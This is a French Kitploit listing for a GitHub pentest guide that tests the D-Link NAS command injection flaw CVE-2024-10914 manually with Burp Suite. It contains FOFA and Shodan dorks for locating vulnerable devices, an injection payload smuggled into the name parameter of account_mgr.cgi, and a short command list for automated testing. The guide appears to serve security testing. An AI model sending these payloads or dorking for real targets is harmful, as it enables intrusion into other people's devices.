Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10914 — CVE-2024-10914_Tests manuels avec burpsuite | Kitploit
Outils/GitHubGitHub/egi08/cve-2024-10914
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionCommandement et Contrôle
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_Tests manuels avec burpsuite

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10914 Test de vulnérabilité d'injection de commandes pour D-Link NAS_Test manuel avec burpsuite


Dork pour trouver les appareils vulnérables

Utilisez le dork de recherche suivant pour trouver des appareils D-Link NAS potentiellement vulnérables :

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

Cette chaîne de recherche permet d'identifier les appareils exécutant l'application D-Link DNS ShareCenter vulnérable avec la version spécifique du serveur Lighttpd affectée par la vulnérabilité.


Ce guide fournit des instructions étape par étape sur la façon de tester manuellement une vulnérabilité d'injection de commandes (CVE-2024-10914) dans le paramètre name des NAS D-Link à l'aide de Burp Suite. URL cible : http://Target.

Prérequis

  • Burp Suite
  • Un navigateur web configuré pour utiliser Burp Suite comme proxy (généralement défini sur 127.0.0.1:8080)

Étape 1 : Configurer Burp Suite

Télécharger l’outil
  1. Lancer Burp Suite : Démarrez Burp Suite sur votre machine.
  2. Configurer le proxy : Assurez-vous que votre navigateur est configuré pour utiliser Burp Suite comme proxy en définissant les paramètres de proxy du navigateur sur 127.0.0.1 au port 8080.

Étape 2 : Intercepter la requête

  1. Naviguer vers la cible : Dans votre navigateur, allez sur http://Target.
  2. Activer l'interception : Dans Burp Suite, activez la fonction d'interception pour capturer la requête sortante.

Étape 3 : Modifier la requête

  1. Localiser le paramètre vulnérable : Dans la requête interceptée, recherchez le paramètre name dans l'URL. Il devrait apparaître comme suit :

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. Injecter une commande de test : Modifiez le paramètre name pour y inclure une commande de test comme echo "test" :

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. Envoyer la requête modifiée : Transmettez la requête modifiée au serveur.


Étape 4 : Analyser la réponse

  1. Vérifier la réponse : Recherchez la sortie de la commande injectée dans la réponse. Par exemple, si le serveur a exécuté echo "test", vous devriez voir :

    root@kitploit:~
    test
    

Étape 5 : Exploiter la vulnérabilité

  1. Injecter une commande malveillante : Si le test réussit, essayez des commandes plus sophistiquées, comme :

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. Envoyer la requête d'exploitation : Transmettez cette requête au serveur.

  3. Analyser la réponse : Vérifiez si la sortie de la commande (par exemple, les informations d'ID utilisateur) est présente dans la réponse.


Étape 6 : Automatiser avec les extensions Burp Suite (optionnel)

  1. Utiliser Intruder : Automatisez les tests avec l'outil Intruder de Burp Suite.

    • Cliquez avec le bouton droit sur la requête et sélectionnez Send to Intruder.
    • Définissez le paramètre name comme position de payload.
    • Utilisez une liste de commandes comme payloads pour les tests.
  2. Exemples de payloads :

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Démarrer Intruder : Lancez l'attaque Intruder pour tester plusieurs payloads automatiquement.